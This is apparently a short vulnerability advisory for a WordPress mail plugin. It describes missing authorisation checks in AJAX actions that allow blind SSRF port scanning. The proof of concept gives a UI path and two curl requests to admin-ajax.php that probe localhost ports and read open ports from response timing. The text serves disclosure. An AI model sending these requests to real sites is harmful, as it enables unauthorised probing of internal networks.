The plugin does not have proper authorisation in some AJAX actions, which could allow high privilege users such as admin to perform blind SSRF on multisite installations for example.

PoC

Navigate to https://example.com/wp-admin/admin.php?page=postman%2Fport_test # Inside “Outgoing Mail Server Hostname” parameter fill the target host and port number localhost:44 # If it takes too much time to return the results, this means that the port is open -– curl requests — curl ‘http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true’ -X POST -H ‘Cookie: WP COOKIES’ --data ‘action=postman_test_smtps&hostname;=localhost%3A44&port;=465&security;=6b297e1647’ curl ‘http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true’ -X POST -H ‘Cookie: WP COOKIES’ --data ‘action=postman_test_port&hostname;=localhost%3A1338&port;=25&security;=6b297e1647’